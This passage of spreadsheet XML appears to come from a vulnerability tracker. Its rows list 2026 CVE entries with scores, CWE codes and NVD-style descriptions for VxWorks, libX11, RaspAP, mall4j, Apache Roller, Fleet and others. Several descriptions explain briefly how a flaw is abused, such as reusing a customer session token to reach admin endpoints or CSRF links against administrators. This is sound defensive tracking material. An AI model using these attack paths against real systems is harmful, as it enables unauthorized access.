        </is>
      </c>
      <c r="D225" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E225" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F225" s="5" t="inlineStr">
        <is>
          <t>0bf9931a-6ebf-4f48-bd14-39ee5e1d61f8</t>
        </is>
      </c>
      <c r="G225" s="5" t="inlineStr"/>
      <c r="H225" s="5" t="inlineStr"/>
      <c r="I225" s="5" t="inlineStr"/>
      <c r="J225" s="5" t="inlineStr"/>
      <c r="K225" s="5" t="inlineStr"/>
      <c r="L225" s="5" t="inlineStr"/>
      <c r="M225" s="5" t="inlineStr"/>
      <c r="N225" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O225" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P225" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q225" s="5" t="inlineStr"/>
      <c r="R225" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S225" s="5" t="inlineStr">
        <is>
          <t>Wind River VxWorks 7 24.03 through 26.03, a memory leak occurs under specific, non-default configuration states when processing specific service routines, causing the system to terminate operations before releasing allocated memory pools. Fixed in VxWorks 7 26.09</t>
        </is>
      </c>
      <c r="T225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102005</t>
        </is>
      </c>
    </row>
    <row r="226">
      <c r="A226" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B226" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102006</t>
        </is>
      </c>
      <c r="D226" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E226" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F226" s="5" t="inlineStr">
        <is>
          <t>0bf9931a-6ebf-4f48-bd14-39ee5e1d61f8</t>
        </is>
      </c>
      <c r="G226" s="5" t="inlineStr"/>
      <c r="H226" s="5" t="inlineStr"/>
      <c r="I226" s="5" t="inlineStr"/>
      <c r="J226" s="5" t="inlineStr"/>
      <c r="K226" s="5" t="inlineStr"/>
      <c r="L226" s="5" t="inlineStr"/>
      <c r="M226" s="5" t="inlineStr"/>
      <c r="N226" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O226" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P226" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q226" s="5" t="inlineStr"/>
      <c r="R226" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S226" s="5" t="inlineStr">
        <is>
          <t>In Wind River VxWorks 7 prior to 26.09, specific system call arguments can result in the process management subsystem failing to properly release allocated kernel memory before terminating the calling application. Fixed in Version 26.09</t>
        </is>
      </c>
      <c r="T226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102006</t>
        </is>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B227" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94284</t>
        </is>
      </c>
      <c r="D227" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E227" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F227" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G227" s="5" t="inlineStr"/>
      <c r="H227" s="5" t="inlineStr"/>
      <c r="I227" s="5" t="inlineStr"/>
      <c r="J227" s="5" t="inlineStr"/>
      <c r="K227" s="5" t="inlineStr"/>
      <c r="L227" s="5" t="inlineStr"/>
      <c r="M227" s="5" t="inlineStr"/>
      <c r="N227" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O227" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P227" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q227" s="5" t="inlineStr"/>
      <c r="R227" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S227" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read vulnerability in libX11's XIM trigger-key registration parser in libX11 before 1.8.14 could be used by malicious X servers to crash attached X clients.</t>
        </is>
      </c>
      <c r="T227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94284</t>
        </is>
      </c>
    </row>
    <row r="228">
      <c r="A228" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B228" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94287</t>
        </is>
      </c>
      <c r="D228" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E228" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F228" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G228" s="5" t="inlineStr"/>
      <c r="H228" s="5" t="inlineStr"/>
      <c r="I228" s="5" t="inlineStr"/>
      <c r="J228" s="5" t="inlineStr"/>
      <c r="K228" s="5" t="inlineStr"/>
      <c r="L228" s="5" t="inlineStr"/>
      <c r="M228" s="5" t="inlineStr"/>
      <c r="N228" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O228" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P228" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q228" s="5" t="inlineStr"/>
      <c r="R228" s="5" t="inlineStr">
        <is>
          <t>CWE-1050</t>
        </is>
      </c>
      <c r="S228" s="5" t="inlineStr">
        <is>
          <t>A denial of service via unsigned underflow in libXpm's write path in libXpm before 3.5.19 could be used by local attackers to cause unbounded CPU usage and memory exhaustion.</t>
        </is>
      </c>
      <c r="T228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94287</t>
        </is>
      </c>
    </row>
    <row r="229">
      <c r="A229" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B229" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97686</t>
        </is>
      </c>
      <c r="D229" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E229" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F229" s="5" t="inlineStr">
        <is>
          <t>0bf9931a-6ebf-4f48-bd14-39ee5e1d61f8</t>
        </is>
      </c>
      <c r="G229" s="5" t="inlineStr"/>
      <c r="H229" s="5" t="inlineStr"/>
      <c r="I229" s="5" t="inlineStr"/>
      <c r="J229" s="5" t="inlineStr"/>
      <c r="K229" s="5" t="inlineStr"/>
      <c r="L229" s="5" t="inlineStr"/>
      <c r="M229" s="5" t="inlineStr"/>
      <c r="N229" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O229" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P229" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q229" s="5" t="inlineStr"/>
      <c r="R229" s="5" t="inlineStr">
        <is>
          <t>CWE-772</t>
        </is>
      </c>
      <c r="S229" s="5" t="inlineStr">
        <is>
          <t>Wind River VxWorks 7 prior to 26.09, specific system call arguments can result in the IPNET subsystem failing to properly release allocated kernel memory and system file descriptors before terminating the calling application. Fixed in Version 26.09.</t>
        </is>
      </c>
      <c r="T229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97686</t>
        </is>
      </c>
    </row>
    <row r="230">
      <c r="A230" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B230" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101093</t>
        </is>
      </c>
      <c r="D230" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E230" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G230" s="5" t="inlineStr"/>
      <c r="H230" s="5" t="inlineStr"/>
      <c r="I230" s="5" t="inlineStr"/>
      <c r="J230" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K230" s="5" t="inlineStr"/>
      <c r="L230" s="5" t="inlineStr"/>
      <c r="M230" s="5" t="inlineStr"/>
      <c r="N230" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O230" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P230" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q230" s="5" t="inlineStr"/>
      <c r="R230" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="S230" s="5" t="inlineStr">
        <is>
          <t>Cotonti through 1.0.0 contains a cross-site request forgery vulnerability in admin.users.php that allows attackers to delete user groups without token verification. Attackers can craft malicious links or pages that trick authenticated administrators into deleting custom groups and their associated permissions by riding the administrator's session.</t>
        </is>
      </c>
      <c r="T230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101093</t>
        </is>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B231" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101100</t>
        </is>
      </c>
      <c r="D231" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E231" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G231" s="5" t="inlineStr"/>
      <c r="H231" s="5" t="inlineStr"/>
      <c r="I231" s="5" t="inlineStr"/>
      <c r="J231" s="5" t="inlineStr">
        <is>
          <t>f5, typescript</t>
        </is>
      </c>
      <c r="K231" s="5" t="inlineStr"/>
      <c r="L231" s="5" t="inlineStr"/>
      <c r="M231" s="5" t="inlineStr"/>
      <c r="N231" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O231" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P231" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q231" s="5" t="inlineStr"/>
      <c r="R231" s="5" t="inlineStr">
        <is>
          <t>CWE-459</t>
        </is>
      </c>
      <c r="S231" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in ag-ui-protocol ag-ui up to 2026-09-07. This vulnerability affects the function FilterToolCallsMiddleware of the file sdks/typescript/packages/client/src/middleware/filter-tool-calls.ts of the component Middleware. Executing a manipulation can lead to incomplete cleanup. The attack may be launched remotely. Upgrading to version 2026-09-08 is able to resolve this issue. This patch is called c346119fe870b70f5c19738ee5119f3e1456e59d. It is suggested to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101100</t>
        </is>
      </c>
    </row>
    <row r="232">
      <c r="A232" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B232" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101859</t>
        </is>
      </c>
      <c r="D232" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E232" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G232" s="5" t="inlineStr"/>
      <c r="H232" s="5" t="inlineStr"/>
      <c r="I232" s="5" t="inlineStr"/>
      <c r="J232" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K232" s="5" t="inlineStr"/>
      <c r="L232" s="5" t="inlineStr"/>
      <c r="M232" s="5" t="inlineStr"/>
      <c r="N232" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O232" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P232" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q232" s="5" t="inlineStr"/>
      <c r="R232" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S232" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in RaspAP raspap-webgui up to 3.5.5. Affected by this vulnerability is the function escapeshellcmd of the file ajax/openvpn/del_ovpncfg.php of the component OpenVPN Configuration Handler. Such manipulation of the argument cfg_id leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101859</t>
        </is>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B233" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102261</t>
        </is>
      </c>
      <c r="D233" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E233" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G233" s="5" t="inlineStr"/>
      <c r="H233" s="5" t="inlineStr"/>
      <c r="I233" s="5" t="inlineStr"/>
      <c r="J233" s="5" t="inlineStr"/>
      <c r="K233" s="5" t="inlineStr"/>
      <c r="L233" s="5" t="inlineStr"/>
      <c r="M233" s="5" t="inlineStr"/>
      <c r="N233" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O233" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P233" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q233" s="5" t="inlineStr"/>
      <c r="R233" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="S233" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in owen2345 Camaleon CMS up to 2.9.2. Impacted is the function crop of the file app/controllers/camaleon_cms/admin/media_controller.rb of the component Media Crop Handler. This manipulation of the argument saved_avatar causes authorization bypass. The attack may be initiated remotely. The exploit has been published and may be used. Upgrading to version 2.9.3 is recommended to address this issue. Patch name: c143e145caa600947e70a240e87f2fed889149d3. It is suggested to upgrade the affected component.</t>
        </is>
      </c>
      <c r="T233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102261</t>
        </is>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B234" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102364</t>
        </is>
      </c>
      <c r="D234" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E234" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G234" s="5" t="inlineStr"/>
      <c r="H234" s="5" t="inlineStr"/>
      <c r="I234" s="5" t="inlineStr"/>
      <c r="J234" s="5" t="inlineStr"/>
      <c r="K234" s="5" t="inlineStr"/>
      <c r="L234" s="5" t="inlineStr"/>
      <c r="M234" s="5" t="inlineStr"/>
      <c r="N234" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O234" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P234" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q234" s="5" t="inlineStr"/>
      <c r="R234" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S234" s="5" t="inlineStr">
        <is>
          <t>mall4j through 4.0 fails to validate the sysType field in sa-token sessions, allowing storefront customers to authenticate as back-office users by reusing their session tokens. Attackers can register on the public storefront and use their customer session token to access admin endpoints lacking @PreAuthorize permission checks, including menu listings, file uploads, and configuration endpoints.</t>
        </is>
      </c>
      <c r="T234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102364</t>
        </is>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B235" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102367</t>
        </is>
      </c>
      <c r="D235" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E235" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G235" s="5" t="inlineStr"/>
      <c r="H235" s="5" t="inlineStr"/>
      <c r="I235" s="5" t="inlineStr"/>
      <c r="J235" s="5" t="inlineStr"/>
      <c r="K235" s="5" t="inlineStr"/>
      <c r="L235" s="5" t="inlineStr"/>
      <c r="M235" s="5" t="inlineStr"/>
      <c r="N235" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O235" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P235" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q235" s="5" t="inlineStr"/>
      <c r="R235" s="5" t="inlineStr">
        <is>
          <t>CWE-613</t>
        </is>
      </c>
      <c r="S235" s="5" t="inlineStr">
        <is>
          <t>mall4j through 4.0 contains an insufficient session expiration vulnerability in the token refresh endpoint that fails to validate the enabled flag when issuing new sessions. Disabled user accounts can indefinitely renew their sessions through the POST /token/refresh endpoint, retaining access that account disabling was intended to remove.</t>
        </is>
      </c>
      <c r="T235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102367</t>
        </is>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B236" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82381</t>
        </is>
      </c>
      <c r="D236" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E236" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F236" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G236" s="5" t="inlineStr"/>
      <c r="H236" s="5" t="inlineStr"/>
      <c r="I236" s="5" t="inlineStr"/>
      <c r="J236" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K236" s="5" t="inlineStr"/>
      <c r="L236" s="5" t="inlineStr"/>
      <c r="M236" s="5" t="inlineStr"/>
      <c r="N236" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O236" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P236" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q236" s="5" t="inlineStr"/>
      <c r="R236" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S236" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Apache Roller 6.1.5 allows a user with authoring rights on a weblog to store crafted content that is later written into the authoring UI's JavaScript string literals and markup sinks without proper encoding, causing the stored script to execute in another author's or administrator's browser. No optional feature or non-default configuration is required; this affects weblogs with multiple authors or administrators who are not mutually trusted. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which moves those values out of JavaScript literals and writes them as text.</t>
        </is>
      </c>
      <c r="T236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82381</t>
        </is>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B237" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82387</t>
        </is>
      </c>
      <c r="D237" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E237" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F237" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G237" s="5" t="inlineStr"/>
      <c r="H237" s="5" t="inlineStr"/>
      <c r="I237" s="5" t="inlineStr"/>
      <c r="J237" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K237" s="5" t="inlineStr"/>
      <c r="L237" s="5" t="inlineStr"/>
      <c r="M237" s="5" t="inlineStr"/>
      <c r="N237" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O237" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P237" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q237" s="5" t="inlineStr"/>
      <c r="R237" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S237" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in Apache Roller 6.1.5 allows a user with media-upload rights to store active content on Roller's origin, because the media upload feature trusts the upload-supplied content type and serves the stored file back with that type. A victim who opens the uploaded file executes the stored script. Media uploads are disabled by default; only installations that enable them are affected, and the shipped type restrictions do not block active content once uploads are on. Users are recommended to upgrade to Apache Roller 6.1.6 or later, which derives the stored type from file content and serves non-image media as a download.</t>
        </is>
      </c>
      <c r="T237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82387</t>
        </is>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B238" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82969</t>
        </is>
      </c>
      <c r="D238" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E238" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F238" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G238" s="5" t="inlineStr"/>
      <c r="H238" s="5" t="inlineStr"/>
      <c r="I238" s="5" t="inlineStr"/>
      <c r="J238" s="5" t="inlineStr"/>
      <c r="K238" s="5" t="inlineStr"/>
      <c r="L238" s="5" t="inlineStr"/>
      <c r="M238" s="5" t="inlineStr"/>
      <c r="N238" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O238" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P238" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q238" s="5" t="inlineStr"/>
      <c r="R238" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S238" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Bimser Solution Software Trade Inc. EBA Plus Document and Workflow Management System allows Stored XSS.
This issue affects eBA Plus Document and Workflow Management System: from 6.7.141 before 10.0.11.</t>
        </is>
      </c>
      <c r="T238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82969</t>
        </is>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B239" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88828</t>
        </is>
      </c>
      <c r="D239" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E239" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F239" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G239" s="5" t="inlineStr"/>
      <c r="H239" s="5" t="inlineStr"/>
      <c r="I239" s="5" t="inlineStr"/>
      <c r="J239" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K239" s="5" t="inlineStr"/>
      <c r="L239" s="5" t="inlineStr"/>
      <c r="M239" s="5" t="inlineStr"/>
      <c r="N239" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O239" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P239" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q239" s="5" t="inlineStr"/>
      <c r="R239" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S239" s="5" t="inlineStr">
        <is>
          <t>The Blacklist Manager for WooCommerce WordPress plugin from 1.3.0 to 2.3.1 does not enforce its user blocking on every authentication path, allowing the holder of an account the site owner has blocked to keep authenticating with that account's privileges, without the block being enforced or recorded.</t>
        </is>
      </c>
      <c r="T239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88828</t>
        </is>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B240" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93539</t>
        </is>
      </c>
      <c r="D240" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="E240" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F240" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G240" s="5" t="inlineStr"/>
      <c r="H240" s="5" t="inlineStr"/>
      <c r="I240" s="5" t="inlineStr"/>
      <c r="J240" s="5" t="inlineStr">
        <is>
          <t>kubernetes, requests, gin, suse</t>
        </is>
      </c>
      <c r="K240" s="5" t="inlineStr"/>
      <c r="L240" s="5" t="inlineStr"/>
      <c r="M240" s="5" t="inlineStr"/>
      <c r="N240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O240" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P240" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q240" s="5" t="inlineStr"/>
      <c r="R240" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S240" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was discovered in Fleet's Git webhook receiver (the gitjob webhook service). When a webhook secret is not configured, incoming webhook requests are accepted without verification, and processing a request can change the spec.pollingInterval field of a matching GitRepo resource in any namespace. A caller with network access to the webhook service and no Kubernetes credentials can therefore alter GitRepo configuration outside
the namespaces they are authorized for.  This only affects SUSE Rancher Fleet 0.16 before 0.16.2, older versions are not affected.</t>
        </is>
      </c>
      <c r="T240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93539</t>
        </is>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
